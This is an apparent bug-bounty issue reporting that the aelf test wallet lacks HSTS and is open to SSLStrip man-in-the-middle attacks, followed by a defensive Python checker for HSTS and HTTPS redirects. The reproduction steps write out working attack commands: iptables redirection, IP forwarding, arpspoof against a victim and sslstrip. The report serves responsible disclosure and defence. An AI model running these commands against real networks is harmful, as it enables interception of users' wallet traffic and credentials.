[Community Bug] + Wallet is Vulnerable to MiTM #53
Comments
cool, we will fix it. Reference link to get more about HTTPS:
Great. Thank you.
@everyone Thanks
Dear ngpentest007, Thank you for participating in aelf Enterprise 0.8.0 Beta version public testing. Contact Information:
Vulnerability: Wallet is Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the wallet is vulnerable to a MiTM (Man in the Middle) attack. This means an attacker can intercept the connection between a web browser and a trusted wallet by forcing the wallet to load without utilizing SSL/TLS.
Vulnerable Application: Wallet https://wallet-test.aelf.io
Severity: High
Steps to Reproduce:
1- Enter the below command in a Linux command prompt:
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding:
   echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use ARP spoofing against the target victim:
   arpspoof -i eth0 -t <victim ip> <gateway ip>
4- You should now see that arpspoof is running. Now in a separate terminal window type the following command:
   sslstrip -l 8080
5- When the victim tries to access wallet-test.aelf.io it will load over HTTP.
Or:
check for the presence of the HSTS header in the response.
Impact: An attacker can force the wallet to utilize HTTP. Once the wallet is over HTTP then an attacker can sniff the communication.
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
1- Enable HSTS
2- Enable HTTPS throughout the website
Screenshot: Shows wallet is NOW accessible over HTTP
Attack Reference: Reference link to understand more about this issue:
https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
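The report's "Fix" section asks for HSTS plus site-wide HTTPS, and its alternative reproduction step is to look for the header in the response. The following is an added checker written for this page; it is not part of the original issue and not the aelf project's code. It parses a raw HTTP response and reports what is missing for SSLStrip resistance, applying the RFC 6797 rule that a Strict-Transport-Security header only counts when it arrives over HTTPS, and requiring the plain-HTTP side to answer with a redirect to https://. All sample responses below are constructed, none were captured from wallet-test.aelf.io; the host name `example.test` and the one-year `ONE_YEAR` threshold are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Assumed policy threshold: one year is the usual minimum for a meaningful
# HSTS max-age (and what the browser preload list requires).
ONE_YEAR = 31_536_000

REDIRECT_STATUSES = (301, 302, 307, 308)


@dataclass
class HstsFinding:
    scheme: str                      # "http" or "https": which connection the response came over
    status: int
    hsts_present: bool
    max_age: Optional[int] = None
    include_subdomains: bool = False
    preload: bool = False
    problems: list = field(default_factory=list)


def parse_response(raw: str) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP/1.x response into (status code, {lower-case header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers: Dict[str, str] = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def parse_hsts(value: str) -> Tuple[Optional[int], bool, bool]:
    """Parse a Strict-Transport-Security value (RFC 6797 s6.1): ';'-separated,
    case-insensitive directives; max-age may be a quoted or bare integer."""
    max_age: Optional[int] = None
    include_subdomains = preload = False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', val.strip())
            if m:
                max_age = int(m.group(1))
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
    return max_age, include_subdomains, preload


def assess(raw: str, scheme: str) -> HstsFinding:
    """Evaluate one response against the two fixes the report recommends."""
    status, headers = parse_response(raw)
    f = HstsFinding(scheme=scheme, status=status,
                    hsts_present="strict-transport-security" in headers)
    if scheme == "http":
        # Port 80 must only ever redirect to https://; serving content here is
        # exactly what sslstrip exploits.
        location = headers.get("location", "")
        if not (status in REDIRECT_STATUSES and location.lower().startswith("https://")):
            f.problems.append("plain HTTP served content instead of redirecting to https://")
        if f.hsts_present:
            # Browsers ignore HSTS received over plain HTTP (RFC 6797 s8.1).
            f.problems.append("HSTS header over HTTP is ignored; send it on the HTTPS response")
        return f
    if not f.hsts_present:
        f.problems.append("no Strict-Transport-Security header on the HTTPS response")
        return f
    f.max_age, f.include_subdomains, f.preload = parse_hsts(headers["strict-transport-security"])
    if f.max_age is None:
        f.problems.append("max-age missing: header is invalid and will be ignored")
    elif f.max_age < ONE_YEAR:
        f.problems.append(f"max-age={f.max_age} is short; use at least {ONE_YEAR}")
    if not f.include_subdomains:
        f.problems.append("includeSubDomains absent: subdomains remain strippable")
    return f


# Constructed sample responses (not captured from any real host).
HTTP_SERVES_CONTENT = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>wallet</html>"
HTTP_REDIRECTS = "HTTP/1.1 301 Moved Permanently\r\nLocation: https://example.test/\r\n\r\n"
HTTPS_NO_HSTS = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
HTTPS_GOOD = ("HTTP/1.1 200 OK\r\n"
              "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n\r\n")

if __name__ == "__main__":
    for label, raw, scheme in [("http, content", HTTP_SERVES_CONTENT, "http"),
                               ("http, redirect", HTTP_REDIRECTS, "http"),
                               ("https, no hsts", HTTPS_NO_HSTS, "https"),
                               ("https, good", HTTPS_GOOD, "https")]:
        r = assess(raw, scheme)
        print(f"{label}: {'OK' if not r.problems else '; '.join(r.problems)}")
```

Against a live host the same checks can be fed from `curl -sI http://<host>/` and `curl -sI https://<host>/`. One caveat the report does not spell out: HSTS is trust-on-first-use, so a browser that has never completed an HTTPS visit (or for which the policy has expired) is still strippable until the domain is on the preload list; that is why the port-80 redirect and a long max-age both matter.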